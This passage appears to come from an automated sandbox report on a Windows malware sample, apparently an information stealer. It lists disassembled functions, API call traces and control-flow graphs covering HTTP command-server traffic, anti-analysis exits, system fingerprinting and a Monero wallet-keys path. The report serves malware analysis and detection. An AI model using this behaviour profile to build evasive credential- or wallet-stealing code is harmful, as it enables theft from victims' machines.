                  • GetProcAddress.KERNEL32(753A0000,01046700), ref: 0093A3CB
                  • GetProcAddress.KERNEL32(753A0000,01046740), ref: 0093A3E4
                  • GetProcAddress.KERNEL32(753A0000,0105D1A0), ref: 0093A3FC
                  • GetProcAddress.KERNEL32(753A0000,0105D230), ref: 0093A414
                  • GetProcAddress.KERNEL32(76DA0000,01046780), ref: 0093A436
                  • GetProcAddress.KERNEL32(76DA0000,0105D278), ref: 0093A44E
                  • GetProcAddress.KERNEL32(76DA0000,0105D3D8), ref: 0093A466
                  • GetProcAddress.KERNEL32(76DA0000,0105D420), ref: 0093A47F
                  • GetProcAddress.KERNEL32(76DA0000,0105D4B0), ref: 0093A497
                  • GetProcAddress.KERNEL32(77300000,01046840), ref: 0093A4B8
                  • GetProcAddress.KERNEL32(77300000,01046860), ref: 0093A4D1
                  • GetProcAddress.KERNEL32(767E0000,01046660), ref: 0093A4F2
                  • GetProcAddress.KERNEL32(767E0000,0105D360), ref: 0093A50A
                  • GetProcAddress.KERNEL32(6F6A0000,01046760), ref: 0093A530
                  • GetProcAddress.KERNEL32(6F6A0000,01046880), ref: 0093A548
                  • GetProcAddress.KERNEL32(6F6A0000,010468A0), ref: 0093A560
                  • GetProcAddress.KERNEL32(6F6A0000,0105D3F0), ref: 0093A579
                  • GetProcAddress.KERNEL32(6F6A0000,010467A0), ref: 0093A591
                  • GetProcAddress.KERNEL32(6F6A0000,010468E0), ref: 0093A5A9
                  • GetProcAddress.KERNEL32(6F6A0000,010467C0), ref: 0093A5C2
                  • GetProcAddress.KERNEL32(6F6A0000,01046600), ref: 0093A5DA
                  • GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 0093A5F1
                  • GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 0093A607
                  • GetProcAddress.KERNEL32(75760000,0105D438), ref: 0093A629
                  • GetProcAddress.KERNEL32(75760000,01058E20), ref: 0093A641
                  • GetProcAddress.KERNEL32(75760000,0105D408), ref: 0093A659
                  • GetProcAddress.KERNEL32(75760000,0105D498), ref: 0093A672
                  • GetProcAddress.KERNEL32(762C0000,010468C0), ref: 0093A693
                  • GetProcAddress.KERNEL32(6EB60000,0105D4C8), ref: 0093A6B4
                  • GetProcAddress.KERNEL32(6EB60000,010467E0), ref: 0093A6CD
                  • GetProcAddress.KERNEL32(6EB60000,0105D4E0), ref: 0093A6E5
                  • GetProcAddress.KERNEL32(6EB60000,0105D450), ref: 0093A6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressProc$LibraryLoad
                  • String ID: HttpQueryInfoA$InternetSetOptionA
                  • API String ID: 2238633743-1775429166
                  • Opcode ID: 2b991a9e20a4cbdf5f25a46b34851a6a8286159a4e01d3f7307409b13a0f92be
                  • Instruction ID: f03561ed58fe73676b65da3d43970b461af45e5b9dc6c4c5de39d2c52016a8b7
                  • Opcode Fuzzy Hash: 2b991a9e20a4cbdf5f25a46b34851a6a8286159a4e01d3f7307409b13a0f92be
                  • Instruction Fuzzy Hash: 4A621DB5510200AFCB44DFA8EE989663BF9F78C701714851AE609E32E4DEBDA841DF53
                  Function 00926280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1033 926280-92630b call 93a7a0 call 9247b0 call 93a740 InternetOpenA StrCmpCA 1040 926314-926318 1033->1040 1041 92630d 1033->1041 1042 926509-926525 call 93a7a0 call 93a800 * 2 1040->1042 1043 92631e-926342 InternetConnectA 1040->1043 1041->1040 1062 926528-92652d 1042->1062 1045 926348-92634c 1043->1045 1046 9264ff-926503 InternetCloseHandle 1043->1046 1048 92635a 1045->1048 1049 92634e-926358 1045->1049 1046->1042 1050 926364-926392 HttpOpenRequestA 1048->1050 1049->1050 1052 9264f5-9264f9 InternetCloseHandle 1050->1052 1053 926398-92639c 1050->1053 1052->1046 1055 9263c5-926405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 92639e-9263bf InternetSetOptionA 1053->1056 1058 926407-926427 call 93a740 call 93a800 * 2 1055->1058 1059 92642c-92644b call 938940 1055->1059 1056->1055 1058->1062 1067 9264c9-9264e9 call 93a740 call 93a800 * 2 1059->1067 1068 92644d-926454 1059->1068 1067->1062 1071 926456-926480 InternetReadFile 1068->1071 1072 9264c7-9264ef InternetCloseHandle 1068->1072 1073 926482-926489 1071->1073 1074 92648b 1071->1074 1072->1052 1073->1074 1078 92648d-9264c5 call 93a9b0 call 93a8a0 call 93a800 1073->1078 1074->1072 1078->1071
                  APIs
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00924839
                    • Part of subcall function 009247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00924849
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • InternetOpenA.WININET(00940DFE,00000001,00000000,00000000,00000000), ref: 009262E1
                  • StrCmpCA.SHLWAPI(?,0105E790), ref: 00926303
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00926335
                  • HttpOpenRequestA.WININET(00000000,GET,?,0105EAD0,00000000,00000000,00400100,00000000), ref: 00926385
                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009263BF
                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009263D1
                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009263FD
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0092646D
                  • InternetCloseHandle.WININET(00000000), ref: 009264EF
                  • InternetCloseHandle.WININET(00000000), ref: 009264F9
                  • InternetCloseHandle.WININET(00000000), ref: 00926503
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                  • String ID: ERROR$ERROR$GET
                  • API String ID: 3749127164-2509457195
                  • Opcode ID: bd89955fdaac475cadebc48df33c487a637d54f6e407a8971d5fbe68020f32fb
                  • Instruction ID: 6f101d75e2b397e85bab288f262666e1ff9c2fe0625489cd3ba8f4cc62909582
                  • Opcode Fuzzy Hash: bd89955fdaac475cadebc48df33c487a637d54f6e407a8971d5fbe68020f32fb
                  • Instruction Fuzzy Hash: 6A712D71A00218ABDF24EFA0DC49FEEB778BB44700F108198F50A6B5D4DBB46A85CF52
                  Function 00935510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1090 935510-935577 call 935ad0 call 93a820 * 3 call 93a740 * 4 1106 93557c-935583 1090->1106 1107 9355d7-93564c call 93a740 * 2 call 921590 call 9352c0 call 93a8a0 call 93a800 call 93aad0 StrCmpCA 1106->1107 1108 935585-9355b6 call 93a820 call 93a7a0 call 921590 call 9351f0 1106->1108 1134 935693-9356a9 call 93aad0 StrCmpCA 1107->1134 1138 93564e-93568e call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1107->1138 1124 9355bb-9355d2 call 93a8a0 call 93a800 1108->1124 1124->1134 1139 9356af-9356b6 1134->1139 1140 9357dc-935844 call 93a8a0 call 93a820 * 2 call 921670 call 93a800 * 4 call 936560 call 921550 1134->1140 1138->1134 1144 9357da-93585f call 93aad0 StrCmpCA 1139->1144 1145 9356bc-9356c3 1139->1145 1270 935ac3-935ac6 1140->1270 1164 935991-9359f9 call 93a8a0 call 93a820 * 2 call 921670 call 93a800 * 4 call 936560 call 921550 1144->1164 1165 935865-93586c 1144->1165 1149 9356c5-935719 call 93a820 call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1145->1149 1150 93571e-935793 call 93a740 * 2 call 921590 call 9352c0 call 93a8a0 call 93a800 call 93aad0 StrCmpCA 1145->1150 1149->1144 1150->1144 1250 935795-9357d5 call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1150->1250 1164->1270 1171 935872-935879 1165->1171 1172 93598f-935a14 call 93aad0 StrCmpCA 1165->1172 1179 9358d3-935948 call 93a740 * 2 call 921590 call 9352c0 call 93a8a0 call 93a800 call 93aad0 StrCmpCA 1171->1179 1180 93587b-9358ce call 93a820 call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1171->1180 1201 935a16-935a21 Sleep 1172->1201 1202 935a28-935a91 call 93a8a0 call 93a820 * 2 call 921670 call 93a800 * 4 call 936560 call 921550 1172->1202 1179->1172 1275 93594a-93598a call 93a7a0 call 921590 call 9351f0 call 93a8a0 call 93a800 1179->1275 1180->1172 1201->1106 1202->1270 1250->1144 1275->1172
                  APIs
                    • Part of subcall function 0093A820: lstrlen.KERNEL32(00924F05,?,?,00924F05,00940DDE), ref: 0093A82B
                    • Part of subcall function 0093A820: lstrcpy.KERNEL32(00940DDE,00000000), ref: 0093A885
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935644
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009356A1
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935857
                    • Part of subcall function 0093A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0093A7E6
                    • Part of subcall function 009351F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935228
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                    • Part of subcall function 009352C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935318
                    • Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 0093532F
                    • Part of subcall function 009352C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00935364
                    • Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 00935383
                    • Part of subcall function 009352C0: lstrlen.KERNEL32(00000000), ref: 009353AE
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0093578B
                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00935940
                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00935A0C
                  • Sleep.KERNEL32(0000EA60), ref: 00935A1B
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpylstrlen$Sleep
                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                  • API String ID: 507064821-2791005934
                  • Opcode ID: 76610699a5a18742186431c6ea7e7c3677e038ad304ba8e1002c625b8010df00
                  • Instruction ID: 42e8ba15192b47e01c912cad2ccf943d16a1f0f7760a2ed9f8815f90c3d439ee
                  • Opcode Fuzzy Hash: 76610699a5a18742186431c6ea7e7c3677e038ad304ba8e1002c625b8010df00
                  • Instruction Fuzzy Hash: 3FE1FB72910104AACB14FBA0EC96FED7379AFD4300F508568F547A7195EF74AA09CFA2
                  Function 009317A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1301 9317a0-9317cd call 93aad0 StrCmpCA 1304 9317d7-9317f1 call 93aad0 1301->1304 1305 9317cf-9317d1 ExitProcess 1301->1305 1309 9317f4-9317f8 1304->1309 1310 9319c2-9319cd call 93a800 1309->1310 1311 9317fe-931811 1309->1311 1313 931817-93181a 1311->1313 1314 93199e-9319bd 1311->1314 1316 931913-931924 StrCmpCA 1313->1316 1317 931932-931943 StrCmpCA 1313->1317 1318 9318f1-931902 StrCmpCA 1313->1318 1319 931951-931962 StrCmpCA 1313->1319 1320 931970-931981 StrCmpCA 1313->1320 1321 931835-931844 call 93a820 1313->1321 1322 93187f-931890 StrCmpCA 1313->1322 1323 93185d-93186e StrCmpCA 1313->1323 1324 931821-931830 call 93a820 1313->1324 1325 931849-931858 call 93a820 1313->1325 1326 9318cf-9318e0 StrCmpCA 1313->1326 1327 93198f-931999 call 93a820 1313->1327 1328 9318ad-9318be StrCmpCA 1313->1328 1314->1309 1342 931930 1316->1342 1343 931926-931929 1316->1343 1344 931945-931948 1317->1344 1345 93194f 1317->1345 1340 931904-931907 1318->1340 1341 93190e 1318->1341 1346 931964-931967 1319->1346 1347 93196e 1319->1347 1349 931983-931986 1320->1349 1350 93198d 1320->1350 1321->1314 1334 931892-93189c 1322->1334 1335 93189e-9318a1 1322->1335 1332 931870-931873 1323->1332 1333 93187a 1323->1333 1324->1314 1325->1314 1338 9318e2-9318e5 1326->1338 1339 9318ec 1326->1339 1327->1314 1336 9318c0-9318c3 1328->1336 1337 9318ca 1328->1337 1332->1333 1333->1314 1354 9318a8 1334->1354 1335->1354 1336->1337 1337->1314 1338->1339 1339->1314 1340->1341 1341->1314 1342->1314 1343->1342 1344->1345 1345->1314 1346->1347 1347->1314 1349->1350 1350->1314 1354->1314
                  APIs
                  • StrCmpCA.SHLWAPI(00000000,block), ref: 009317C5
                  • ExitProcess.KERNEL32 ref: 009317D1
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitProcess
                  • String ID: block
                  • API String ID: 621844428-2199623458
                  • Opcode ID: 6353981a661574a4479c168a7552e2287329c377fc4eae075701501b6f78372a
                  • Instruction ID: 79e46995d28abd6120a0847a8d658c3c4a815943982e6a2b971a8ccaa15722fb
                  • Opcode Fuzzy Hash: 6353981a661574a4479c168a7552e2287329c377fc4eae075701501b6f78372a
                  • Instruction Fuzzy Hash: A3515AB4A14209EFCB04DFA4E994FBE77B9AF84304F108448E506A73A1D774A955CF62
                  Function 00937500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 1356 937500-93754a GetWindowsDirectoryA 1357 937553-9375c7 GetVolumeInformationA call 938d00 * 3 1356->1357 1358 93754c 1356->1358 1365 9375d8-9375df 1357->1365 1358->1357 1366 9375e1-9375fa call 938d00 1365->1366 1367 9375fc-937617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 937619-937626 call 93a740 1367->1369 1370 937628-937658 wsprintfA call 93a740 1367->1370 1377 93767e-93768e 1369->1377 1370->1377
                  APIs
                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00937542
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0093757F
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937603
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0093760A
                  • wsprintfA.USER32 ref: 00937640
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386099287.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386252254.0000000000FB6000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1386270673.0000000000FB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_920000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                  • String ID: :$C$\
                  • API String ID: 1544550907-3809124531
                  • Opcode ID: 0b6b62d1f40d9c0ac702969726a8e1d06ec950a25f360ca41c225fed55924d13
                  • Instruction ID: e8a04ac7dd2942d874706694db54eff586b009d648213aa86ebce72fdc8d63e0
                  • Opcode Fuzzy Hash: 0b6b62d1f40d9c0ac702969726a8e1d06ec950a25f360ca41c225fed55924d13
                  • Instruction Fuzzy Hash: 2B417EB1D04248ABDF20DB94DC95BEEBBB8AB48704F100199F509672C0DB78AA44CFA5
                  Function 009369F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010541F8), ref: 009398A1
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054228), ref: 009398BA
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054258), ref: 009398D2
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054150), ref: 009398EA
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010540D8), ref: 00939903
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01058E10), ref: 0093991B
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01046260), ref: 00939933
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010461E0), ref: 0093994C
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054198), ref: 00939964
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010540C0), ref: 0093997C
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054168), ref: 00939995
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01054180), ref: 009399AD
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,01046360), ref: 009399C5
                    • Part of subcall function 00939860: GetProcAddress.KERNEL32(76F70000,010541B0), ref: 009399DE
                    • Part of subcall function 0093A740: lstrcpy.KERNEL32(00940E17,00000000), ref: 0093A788
                    • Part of subcall function 009211D0: ExitProcess.KERNEL32 ref: 00921211
                    • Part of subcall function 00921160: GetSystemInfo.KERNEL32(?), ref: 0092116A
                    • Part of subcall function 00921160: ExitProcess.KERNEL32 ref: 0092117E
                    • Part of subcall function 00921110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0092112B
                    • Part of subcall function 00921110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00921132
                    • Part of subcall function 00921110: ExitProcess.KERNEL32 ref: 00921143
                    • Part of subcall function 00921220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0092123E
                    • Part of subcall function 00921220: __aulldiv.LIBCMT ref: 00921258
                    • Part of subcall function 00921220: __aulldiv.LIBCMT ref: 00921266
                    • Part of subcall function 00921220: ExitProcess.KERNEL32 ref: 00921294
                    • Part of subcall function 00936770: GetUserDefaultLangID.KERNEL32 ref: 00936774
                    • Part of subcall function 00921190: ExitProcess.KERNEL32 ref: 009211C6
                    • Part of subcall function 00937850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009211B7), ref: 00937880
                    • Part of subcall function 00937850: RtlAllocateHeap.NTDLL(00000000), ref: 00937887
                    • Part of subcall function 00937850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0093789F
                    • Part of subcall function 009378E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00937910
                    • Part of subcall function 009378E0: RtlAllocateHeap.NTDLL(00000000), ref: 00937917
                    • Part of subcall function 009378E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0093792F
                    • Part of subcall function 0093A9B0: lstrlen.KERNEL32(?,01059110,?,\Monero\wallet.keys,00940E17), ref: 0093A9C5
                    • Part of subcall function 0093A9B0: lstrcpy.KERNEL32(00000000), ref: 0093AA04
                    • Part of subcall function 0093A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0093AA12
                    • Part of subcall function 0093A8A0: lstrcpy.KERNEL32(?,00940E17), ref: 0093A905
                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936ACA
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00936AE8
                  • CloseHandle.KERNEL32(00000000), ref: 00936AF9
                  • Sleep.KERNEL32(00001770), ref: 00936B04
                  • CloseHandle.KERNEL32(?,00000000,?,01058DD0,?,0094110C,?,00000000,?,00941110,?,00000000,00940AEF), ref: 00936B1A
                  • ExitProcess.KERNEL32 ref: 00936B22
                  Memory Dump Source
                  • Source File: 00000001.00000002.1381891899.0000000000921000.00000040.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                  • Associated: 00000001.00000002.1381863597.0000000000920000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.00000000009DD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000A02000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1381891899.0000000000B6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000B7E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000CFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000DDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000001.00000002.1384277348.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
